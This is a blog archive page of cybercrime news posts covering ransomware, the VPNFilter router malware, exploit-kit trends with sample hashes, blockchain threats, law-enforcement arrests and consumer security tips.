Category Archives: Cybercrime

Free Societies are at a Disadvantage in National Cybersecurity

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.

McAfee Blogs: Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling

With this writing, we’re joyfully en route to a much-anticipated Florida vacation. A sneak peek into our car — and the thousands of other cars headed south on Interstate 4 — offers a reflection of family life today. Mom has her earbuds on and is listening to her newest audiobook, Dad is nodding along with his favorite podcaster over the car stereo, and the teenager in the back seat is making faces into her phone for her Snapchat pals.

Can we get through this vacation without our faces planted in our phones? Can we find ways to unplug more and plug into the moment? That’s certainly our plan. However, each one of us will have to rely on his or her tech from time to time. Frankly, who doesn’t these days?

Our Tech Reality

It’s nearly impossible to vacation minus our electronics, but we’ve agreed to unplug for several reasons. The first reason, of course, is the goal of being present and enjoying our time together. The second reason we want to limit our tech use while traveling is safety. Nothing has the power to obliterate a family vacation faster than stolen data, credit card info, or devices.

5 tips for a more secure family vacation

  1. Keep devices protected and close. Device theft season is upon us. And, distracted vacationers are the perfect target. So, make sure your smartphone is password protected, security settings are tuned up, and screen lock is on. Keep your phones, tablets, laptops, and handheld gaming devices on your person or locked in a hotel safe when you are away. And, leave at home any electronic equipment you don’t need during your trip.
  2. Turn on Find My Phone. This is a bigger deal than you might guess. No one plans on losing a phone, but hey, it happens. Have the “don’t lose your phone” conversation with your kids several times but back that up by having everyone in the family turn on his or her lost phone app just in case. Consider an extra layer of protection on mobile devices with mobile security software.
  3. Be cautious when using public Wi-Fi. If you need to send an email, photos, or preserve your family’s data plan by jumping on the hotel’s public Wi-Fi while on vacation, make sure that Wi-Fi is secure and attached to a trusted source. Ask for the establishment’s Wi-Fi and log on to that exact name. Hackers can easily create fake hotspots (called faux towers) with similar names. Also, if you aren’t actively using a hotspot, turn off your Wi-Fi setting as well as “auto-join” setting so that your device is not visible to others. Consider shutting off your Bluetooth setting as well. To be extra sure of security, two tips from the Federal Communications Commission: While using a public Wi-Fi network, periodically adjust your phone settings to forget the network, then log back in again. And, if you want to asses the network’s security, try purposely logging onto the public Wi-Fi using the wrong password. If you can get on anyway, that’s a sign that the network is not secure. The best way to stay safe while traveling may be a Virtual Private Network or VPN. According to one McAfee study, when it comes to Wi-Fi security specifically, 58% of survey respondents know how to check if a Wi-Fi network is secure and safe to use, but less than half (49%) take the time to ensure their connection is secured. Be aware and don’t be in that latter percent.
  4. Keep software updated. Before you travel, check for any software updates on your devices. Updates often fix security bugs and seal up cracks in the system. Add another layer of protection by safeguarding your devices with security software.
  5. Avoid accessing financial data. It’s a good idea to get your banking in order before you leave for vacation. Trying to move funds from one account to another or even check your balance can open you up to hackers if you have to do so on a public network.One of the most significant ways you can secure your family vacation is adopting a mindset of awareness. We get excited while on vacation. We want to send those pictures, transfer that money, or get that email out of the way. Very few of us — especially our kids — are concerned about cyber crooks and thieves trying to ransack our well-laid vacation plans. With a few extra minutes invested into your travel plans, you can thoroughly enjoy your family time.

The post Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling appeared first on McAfee Blogs.



McAfee Blogs

Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling

With this writing, we’re joyfully en route to a much-anticipated Florida vacation. A sneak peek into our car — and the thousands of other cars headed south on Interstate 4 — offers a reflection of family life today. Mom has her earbuds on and is listening to her newest audiobook, Dad is nodding along with his favorite podcaster over the car stereo, and the teenager in the back seat is making faces into her phone for her Snapchat pals.

Can we get through this vacation without our faces planted in our phones? Can we find ways to unplug more and plug into the moment? That’s certainly our plan. However, each one of us will have to rely on his or her tech from time to time. Frankly, who doesn’t these days?

Our Tech Reality

It’s nearly impossible to vacation minus our electronics, but we’ve agreed to unplug for several reasons. The first reason, of course, is the goal of being present and enjoying our time together. The second reason we want to limit our tech use while traveling is safety. Nothing has the power to obliterate a family vacation faster than stolen data, credit card info, or devices.

5 tips for a more secure family vacation

  1. Keep devices protected and close. Device theft season is upon us. And, distracted vacationers are the perfect target. So, make sure your smartphone is password protected, security settings are tuned up, and screen lock is on. Keep your phones, tablets, laptops, and handheld gaming devices on your person or locked in a hotel safe when you are away. And, leave at home any electronic equipment you don’t need during your trip.
  2. Turn on Find My Phone. This is a bigger deal than you might guess. No one plans on losing a phone, but hey, it happens. Have the “don’t lose your phone” conversation with your kids several times but back that up by having everyone in the family turn on his or her lost phone app just in case. Consider an extra layer of protection on mobile devices with mobile security software.
  3. Be cautious when using public Wi-Fi. If you need to send an email, photos, or preserve your family’s data plan by jumping on the hotel’s public Wi-Fi while on vacation, make sure that Wi-Fi is secure and attached to a trusted source. Ask for the establishment’s Wi-Fi and log on to that exact name. Hackers can easily create fake hotspots (called faux towers) with similar names. Also, if you aren’t actively using a hotspot, turn off your Wi-Fi setting as well as “auto-join” setting so that your device is not visible to others. Consider shutting off your Bluetooth setting as well. To be extra sure of security, two tips from the Federal Communications Commission: While using a public Wi-Fi network, periodically adjust your phone settings to forget the network, then log back in again. And, if you want to asses the network’s security, try purposely logging onto the public Wi-Fi using the wrong password. If you can get on anyway, that’s a sign that the network is not secure. The best way to stay safe while traveling may be a Virtual Private Network or VPN. According to one McAfee study, when it comes to Wi-Fi security specifically, 58% of survey respondents know how to check if a Wi-Fi network is secure and safe to use, but less than half (49%) take the time to ensure their connection is secured. Be aware and don’t be in that latter percent.
  4. Keep software updated. Before you travel, check for any software updates on your devices. Updates often fix security bugs and seal up cracks in the system. Add another layer of protection by safeguarding your devices with security software.
  5. Avoid accessing financial data. It’s a good idea to get your banking in order before you leave for vacation. Trying to move funds from one account to another or even check your balance can open you up to hackers if you have to do so on a public network.One of the most significant ways you can secure your family vacation is adopting a mindset of awareness. We get excited while on vacation. We want to send those pictures, transfer that money, or get that email out of the way. Very few of us — especially our kids — are concerned about cyber crooks and thieves trying to ransack our well-laid vacation plans. With a few extra minutes invested into your travel plans, you can thoroughly enjoy your family time.

The post Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling appeared first on McAfee Blogs.

Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang

The Europol announced that several French nationals were arrested in the past year on suspicion of being involved with notorious Rex Mundi crime gang.

Another success of the Europol made the headlines, the European police announced that several French nationals were arrested in the past year on suspicion of being involved with notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012. it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).

The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eight in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT)  that started exactly one year ago.” reads the announcement published by the Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that lead to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues the Europol.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer that was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.

Pierluigi Paganini

(Security Affairs – Rex Mundi, cybercrime)

The post Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang appeared first on Security Affairs.

UK law enforcement: an uphill struggle to fight hackers

About 16 years ago in the UK, I walked into a local police station to report a computer crime, because walking into local police stations is how they did things back then. There may well also have been penny farthing bicycles, real pea souper fogs, Mary Poppins, and Jack the Ripper, though I could well be wrong on those last two.

I was greeted at the incident report desk by a bemused officer on duty more used to dealing with stolen bikes or children stuck up trees than anything hacker related, and things went rapidly downhill from his very first question, which was, “What’s an Internet?”

The early days of UK law enforcement and the Internet

I can’t speak for everyone with my solitary anecdote, but even countries that had law enforcement bodies that were was a bit more on the ball with regards all things cyber had their problems, too. I vividly remember being asked to help [redacted entity] with something I’d researched sometime between 2005–08 (being deliberately vague here), resulting in a face-to-face meeting with someone I was half convinced was going to drag me off to a cell. I was helping! You asked me if I could help you! Sadly I can’t say feelings of reciprocal assistance were fostered in any great way, and that’s a shame.

Outside of my own experiences, many security researchers were working in almost total isolation; you couldn’t get ahold of security contacts for major social networks, nobody was on Twitter, huge organisations were missing “contact us” pages, and you were doing very well indeed if you managed to get a dialogue going with, well, pretty much anybody. All communication was done via yelling in blog comments and trying to figure out which people were at security conference dinner queues.

In short, you had hardly anyone talking, vaguely scary law enforcement with technical chops but a general lack of people skills, and officers ready and willing to ask you, “What’s an internet?”.

Frankly, I’m amazed the Internet didn’t burn down into a hole in the ground.

The present day

Things are significantly better now, and many of those problems have been addressed. We have every researcher you can think of available at short notice on sites like Twitter, we have bug bounties/halls of fame, ISPs are a lot more communicative, public facing clearing houses of malware/phishing pages, and most branches of law enforcement have a much better understanding of all things digital.

That’s not to say problems don’t exist, however. A recent report claims British law enforcement is having a tough time of it. If you’ve run into a cyberattack of some kind in the UK, you may find yourself out of luck because apparently only one in three of the 44 police forces in operation are able to deal with computer crime. While police claim some 90 percent of all crime has a digital element to it, their ability to flesh out so-called “cyber units” has been found to be lacking.

Into this already problematic area follows the frequently muddled response to forms of encryption and data privacy. The recent National Crime Agency report on Serious and Organised Crime walked a fine line between acknowledging privacy boons for regular web users, while pointing out the advantage to criminals.

That’s not really a popular line of attack, as it turns out, because the UK government has a thing for wanting to backdoor forms of encryption—and people aren’t really keen on backdoored encryption. Or how about the urge to move into the facial recognition realm, despite a false positive rate of 98 percent? On top of all that, we have this killer quote from a symposium on privacy and corporations:

Tesco probably knows more about me than GCHQ.

While admittedly tongue in cheek, it does raise questions about how much, exactly, we surrender when signing up to membership cards, loyalty accounts, and everything else along the way. Law enforcement would love to get their hands on that kind of profiling, and surveillance capitalism can have major ramifications for societies as a whole.

Essentially, things sound like they’re locked into a stalemate, and no sign of relief seems to be coming anytime soon. And if law enforcement actually is struggling to keep up with datasets and tracking information available to corporations, it’s natural that they’re going to insist on access to all the things, all of the time. At which point, people get rather angry and the cycle repeats itself. Meanwhile, in all of this, the criminals are getting away with all sorts of things.

Wanted: a huge pile of cash

Funding is the be all, end all of UK policing, but with cuts across the board and real-world police numbers down, it’s a hard sell to grab some cash for Internet shenanigans, especially when nobody seems to be entirely clear on what they want to do. Train more police in forensics? DDoS analysis? Malware reversing? Which type of digital attack is likely to be most relevant to the type of police work most commonly seen in the UK? Or, do they want to leapfrog all of that and just go all out on the “Encryption is good for bad people so we definitely want backdoors, thanks” approach?

Who knows, but considering the UK has only pumped £1.3 million into cybercrime training in the last three years, it leaves a lot to be desired. The cash is split between different regions, and that doesn’t go far—as the linked article mentions, North Wales spent £360 on 1,063 individuals to get them trained up from a total pot of £375,448. Meanwhile, there are some regions where a grand total of zero people were trained in aspects of computer crime over a period of three years (perhaps the “What’s an Internet?” officer resides there).

Backup en route

It’s not all bad news. If you could go back in time 16 years and tell me that UK law enforcement would be spending a million pounds on computer crime training, I’d probably be laughing in disbelief until 2018 rolled back around.

Nowadays, there’s plenty of ways to reach the police online, and across a variety of social media. Local and national police websites will often play host to infographics—actual infographics—with useful information on them and everything! There is, at least, money still being invested in the nation as a whole as far as cyberattacks are concerned, to the tune of £1.9 billion over five years to tackle high-level malicious activity.

Even accounting for this, I get the feeling that a bit more money sent to police officers would probably help home users and businesses feel a little more secure and, hopefully, a bit more optimistic that their low-level report to an officer manning the admin desk won’t end up in a large pile of “dunno, lol.”

Imagine a world in which a cyberattack on a home user would result in a phone call to police that actually gets answered and actually gets results. Perhaps it’s only another 16 years away.

The post UK law enforcement: an uphill struggle to fight hackers appeared first on Malwarebytes Labs.

Ransomware Attackers Demand £120,000 from Dorset Business

Attackers demanded £120,000 from a Dorset business after infecting the company’s computer systems with crypto-ransomware. According to the Bournemouth Daily Echo, ransomware actors targeted an engineering firm located in Dorset, a county in the south-western part of England. A spokeswoman for the Dorset Police confirmed the attack and provided additional insight into the malefactors’ demands. […]… Read More

The post Ransomware Attackers Demand £120,000 from Dorset Business appeared first on The State of Security.

5.9 Million Card Details Accessed in Dixons Carphone Hack

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financi

read more

VPNFilter malware still making waves

Last month, a piece of malware called VPNFilter caused chaos for owners of MikroTik, Lynksys, TP-Link, and Netgear equipment. Roughly 500,000 devices worldwide fell victim, with the unwanted parasite able to listen to traffic, steal credentials, damage devices, and more. Until patches started to roll out, the options weren’t great; as one of our researchers, Jovi Umawing told SCMagazine recently:

“While Ukraine is a key target of destabilising cyberattacks for some time now, this particular infection is unlikely to cause issues with the Champions League final. The bigger concern is what people do to combat potential infection; restoring routers to factory settings may eliminate the malware, but it also opens the possibility of becoming vulnerable to older exploits. The best course of action at this point in time is to purchase new hardware, if at all possible.”

That’s right, people were very worried about their football match. And due to the lack of available patches at the time, people were left with the option of running out and buying a new router or sitting around inviting multiple pre-existing, vampire-style exploits over the threshold.

As it turns out, there’s a lot more to consider than who’d end up winning the Champions League, because not only is the threat still around, but it’s also slowly ramping up the problem factor.

VPNFilter: Not gone, and not forgotten

This month, it was revealed the threat was potentially worse than everyone thought, with the ability to attack endpoints otherwise safely hidden behind a firewall. Worse, the number of infected devices has risen from 500,000 to close to one million across 54 countries.

Did you breathe a sigh of relief when initial findings suggested it was “only” 15 to 20 types of router affected, none of which were yours? Well, you might want to stop, because more than 50 others have now been added to the list. A full list can be viewed on the main Talos Intelligence information page.

Make no mistake, VPNFilter malware is highly unpleasant—you don’t want it lurking on your router while it tries to (for example) downgrade HTTPS communications to something unencrypted so it can swipe sensitive data, or snag a list of visited domain names. Everything that goes in and out of a router could potentially be manipulated, so we need to ensure that we do all we can to keep it at bay.

My router is on the list, help!

First thing’s first, don’t panic. One million devices compromised is a big number, but there’s quite a few more routers out there worldwide than one million. The odds of having this ferreting away on your hardware is likely still low. What you need to do is ensure your vendor has rolled out an update to their firmware and apply it.

Sometimes devices don’t install updates with zero user interaction, and you may have to dig around on the product website. This is somewhat rare these days, from my experience at least. At most, you may be redirected or face a pop-up telling you to get on with things and give consent to an update.

Worst case scenario, no patch is available, and you’re stuck between deciding whether to risk sitting around with VPNFilter on your box, or rolling everything back to factory reset condition and potentially being vulnerable to older exploits.

Something to keep in mind is that router features can vary wildly, even when faced with two devices from the same manufacturer. Here’s how a basic bit of updating from Netgear works, for example, but some routers I’ve dealt with can be an absolute mess of poorly laid out tabs and menus which lead nowhere. Keep a search engine handy along with a pen and paper, just in case.

Routers should come out of the box running everything required to keep you and your data secure, but even then, you’ll probably find default logins all over the place. If nothing else, VPNFilter may have inadvertently caused us all to go back and shore up the security of our magical Internet boxes in a more general fashion. Even if VPNFilter never existed, you’ll still probably want to take advantage of secure logins, killing off unwanted services, optimising firewalls, and maybe even turning it off while out to reduce your target size and also save a bit of electricity in the bargain.

It’s not over yet…

Dealing with router issues can be worrying—even those familiar with locking down every aspect on a desktop might not have the faintest idea about the blinky-light box in the corner of the room keeping the traffic moving. That’s perfectly understandable, so don’t feel bad about it. As you can see from the links up above, there’s plenty of resources to sink your teeth into. You can bet that more VPNFilter antics will be in the news over the coming weeks, so keep up to date with the latest happenings. And if your router should end up on one of the affected devices lists, contact your supplier as soon as you possibly can.

The post VPNFilter malware still making waves appeared first on Malwarebytes Labs.

McAfee Blogs: Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IOT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which you users create accounts, manage finances, and even trade currencies including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed and led to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and its users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.



McAfee Blogs

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IOT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which you users create accounts, manage finances, and even trade currencies including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed and led to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and its users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

Has paying the ransom become business as usual?

Radware released its 2018 Executive Application and Network Security Report. For the first time in the survey’s five-year history, a majority of executives (53%) reported paying a hacker’s ransom following a cyber attack. According to the report, 69% of executives said that their company faced a ransom attack in the past year, compared with only 14% noting so in 2016. Meanwhile, two-thirds of executives (66%) report a lack of confidence in their network security, admitting … More

The post Has paying the ransom become business as usual? appeared first on Help Net Security.

U.S. sanctions Russian companies, individuals over cyber attacks

Acting on an executive order, the U.S. government imposed sanctions on five companies and three individuals for their collaboration with the Russian Federal Security Service (FSB) in state-sponsored cyber-attack activity. Three of the companies hit with sanctions by the U.S. Department of the Treasury are a cybersecurity firm Digital Security and...

Read the whole entry... »

Related Stories

Exploit kits: Spring 2018 review

Since our last report on exploit kits, there have been some new developments with the wider adoption of the February Flash zero-day, as well as the inclusion of a new exploit for Internet Explorer. We have not seen that many changes in the drive-by landscape for a long time, although these are the results of improvements closely tied to malspam campaigns and exploits embedded within Microsoft Office.

Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits. While Internet Explorer is not getting any younger, CVE-2018-8174 brings an update to an otherwise 2-year-old vulnerability (CVE-2016-0189), which is still used in some drive-by campaigns. As far as Flash is concerned, CVE-2018-4878 has been adopted by almost all exploits kits. At the time of this writing, a newer Flash vulnerability (CVE-2018-5002) is available but has not been spotted in any EK so far.

RIG

RIG exploit kit remains the most commonly observed EK in the wild, with several different campaigns in action. Rig was the first to include the new VBScript engine exploit (CVE-2018-8174) in IE only days after a Proof of Concept became publicly available, on top of adding CVE-2018-4878. RIG has pushed various payloads such as Bunitu, Ursnif, and the popular SmokeLoader.

GrandSoft

GrandSoft is an IE-only exploit kit which is observed in a smaller range of distribution campaigns, mostly via malvertising on adult sites. In comparison to its counterparts, GrandSoft is still relying on the older Internet Explorer exploit (CVE-2016-0189) and lacks the obfuscation we normally see in landing pages. Some payloads pushed by GrandSoft include the AZORult stealer.

Magnitude

The South Korea–focused exploit kit is back to using its trusted EK Magniber after having a short stint with GandCrab ransomware. Magnitude added Flash (CVE-2018-4878) and went on to integrate IE’s CVE-2018-8174 after a hiatus of about a week with no activity. With its own Magnigate filtering, Base64-encoded landing page and fileless payload, Magnitude is one of the more sophisticated exploit kits on the market.

GreenFlash Sundown

The elusive GreenFlash Sundown continues to strike via compromised OpenX ad servers. Although it is usually seen distributing the Hermes ransomware, 360 Total Security observed a cryptocurrency miner via several Chinese websites running a vulnerable OpenX version. The ad banner used by GF Sundown in this attack, as well as some we documented before, is a Korean language picture that hides CVE-2018-4878 using steganography.

A busy 2018

There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits.

So far, 2018 has been busier than usual with the discoveries of several directly applicable zero-days, and we can expect to see more in the coming months. For instance, we have already witnessed back-to-back Flash zero-days where attackers are capitalizing on ActionScript vulnerabilities.

Mitigation

We tested these exploit kits against Malwarebytes, and they were all blocked thanks to our signature-less anti-exploit engine:

Hashes for samples referenced in this post:

RIG

8CA1DEDCED7332AEDC94291F8DAA82E0837A1EFC612B581DD13165B29F2A6DBB 
21358ACDEB60C456BC36B8E3481BF66CC5F4167D5994F097F71798341B9119FB 
560031AC4C947B1E168704CA5E323BF00A801E2320E1F0FFFE08392179D38391 
AC1FF2B2A18931C17A5D9D0305CE72CC69C1688DFC2BDF4BF74AA9E27123BFFD

GrandSoft

E659DD280514DD81BF8923315BD503E8781EB8CE7684F4888A838CF2A8B2ADF0

Magnitude (dumped from memory with PE-Sieve)

9491E8B30D37CB3BD0D206021EBE7396CA17BE3C8FBED2AC6DCE89D3CE0CAA27

GreenFlash (dumped from memory with PE-Sieve)

e600dec30c0f5080eab3d15f1210334429c3db0dd6a90f1e755709783ace6e85

The post Exploit kits: Spring 2018 review appeared first on Malwarebytes Labs.

Thriving Cybercrime Economy Contributes to More Than $1 Billion in Stolen Cryptocurrency

Users lost $1,148,763,000 in cryptocurrency to cyberthieves during the first half of 2018, a recent study found. The researchers explored various illicit forums on the Dark Web and uncovered a $6.7 million cybercrime economy that revolves around the theft of bitcoin, Etherem and other digital currencies.

In total, the report revealed more than 12,000 such marketplaces containing over 34,000 offerings for would-be crypto-thieves. These products range in value from just over $1 to $1,000, with an average cost of $224. The researchers identified $10 as the “sweet spot” price for the malware samples being sold in these Dark Web forums.

You Get What You Pay For

The authors of the report, titled “Cryptocurrency Gold Rush on the Dark Web,” noted that those prices reflect the purchaser’s level of technical expertise and the degree to which a given sample can evade detection.

“The average listing is likely relatively unsophisticated, and detectable with proper endpoint security,” the report stated. Higher-priced listings, the authors wrote, “enable a more technically proficient user to compile their own malware. While these are still detectable, they are capable of defeating common indicators of compromise (IOCs) and signatures.”

Of the offerings the researchers uncovered, cryptocurrency stealers were the most prevalent at 65 percent of total listings. Cryptojacking malware comprised around 10 percent of offerings on the Dark Web, while mining botnets and mobile malware packages represented just 3.3 percent and 1.6 percent, respectively.

Combating the Cybercrime Economy

The study’s authors advised businesses to protect themselves by deploying an endpoint security solution equipped with prevention and detection capabilities. They also recommended deploying an ad blocker on all endpoints to reduce the risk of attackers hijacking devices to harvest cryptocurrency and restricting access to important financial resources and bank accounts.

Basic security best practices also apply. For example, users should conduct extensive research before participating in a cryptocurrency exchange and create strong, unique passwords across services, the report noted.

